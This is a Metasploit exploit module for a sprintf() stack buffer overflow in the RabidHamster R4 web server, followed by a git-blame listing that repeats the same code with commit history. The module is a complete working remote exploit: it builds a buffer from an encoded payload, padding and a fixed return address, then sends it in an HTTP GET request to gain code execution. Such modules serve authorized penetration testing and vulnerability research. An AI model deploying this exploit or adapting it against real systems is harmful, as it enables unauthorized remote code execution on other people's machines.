metasploit-framework/modules/exploits/windows/http/rabidhamster_r4_log.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in RabidHamster R4's web server.
        By supplying a malformed HTTP request, it is possible to trigger a stack-based
        buffer overflow when generating a log, which may result in arbitrary code
        execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma',  #Discovery, PoC
          'sinn3r'           #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '79007'],
          ['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
          ['URL', 'http://secunia.com/advisories/47901/']
        ],
      'Payload'        =>
        {
          'StackAdjustment' => -3500,
          'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['R4 v1.25', {'Ret'=>0x73790533}]  #JMP ESI (ddraw.dll)
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 09 2012",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptPort.new('RPORT', [true, 'The remote port', 8888])
        ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => '/'
    })

    if res and res.headers['Server'] == 'R4 Embedded Server'
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCoded::Safe
    end
  end

  def exploit
    buf = ''
    buf << payload.encoded
    buf << rand_text_alpha(2022-buf.length, payload_badchars)
    buf << [target.ret].pack("V*")
    buf << pattern_create(200)
    buf << rand_text_alpha(3000-buf.length, payload_badchars)

    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?#{buf}"
    })
  end
end
Add OSVDB-79007 2012-05-25 08:06:28 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add OSVDB-79007 2012-05-25 08:06:28 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = NormalRanking`
Add OSVDB-79007 2012-05-25 08:06:28 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
Add OSVDB-79007 2012-05-25 08:06:28 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",`
			`'Description' => %q{`
			`This module exploits a vulnerability found in RabidHamster R4's web server.`
			`By supplying a malformed HTTP request, it is possible to trigger a stack-based`
			`buffer overflow when generating a log, which may result in arbitrary code`
			`execution under the context of the user.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Luigi Auriemma', #Discovery, PoC`
			`'sinn3r' #Metasploit`
			`],`
			`'References' =>`
			`[`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`['OSVDB', '79007'],`
Retab modules 2013-08-30 21:28:54 +00:00			`['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],`
			`['URL', 'http://secunia.com/advisories/47901/']`
			`],`
			`'Payload' =>`
			`{`
			`'StackAdjustment' => -3500,`
			`'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"`
			`},`
			`'DefaultOptions' =>`
			`{`
change exitfunc to thread 2015-09-01 08:46:54 +00:00			`'EXITFUNC' => 'thread'`
Retab modules 2013-08-30 21:28:54 +00:00			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['R4 v1.25', {'Ret'=>0x73790533}] #JMP ESI (ddraw.dll)`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => "Feb 09 2012",`
			`'DefaultTarget' => 0))`
Add OSVDB-79007 2012-05-25 08:06:28 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`OptPort.new('RPORT', [true, 'The remote port', 8888])`
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`])`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Add OSVDB-79007 2012-05-25 08:06:28 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def check`
			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => '/'`
			`})`
Add OSVDB-79007 2012-05-25 08:06:28 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if res and res.headers['Server'] == 'R4 Embedded Server'`
			`return Exploit::CheckCode::Detected`
			`else`
			`return Exploit::CheckCoded::Safe`
			`end`
			`end`
Add OSVDB-79007 2012-05-25 08:06:28 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`buf = ''`
			`buf << payload.encoded`
			`buf << rand_text_alpha(2022-buf.length, payload_badchars)`
			`buf << [target.ret].pack("V*")`
			`buf << pattern_create(200)`
			`buf << rand_text_alpha(3000-buf.length, payload_badchars)`
Add OSVDB-79007 2012-05-25 08:06:28 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => "/?#{buf}"`
			`})`
			`end`
Add OSVDB-79007 2012-05-25 08:06:28 +00:00			`end`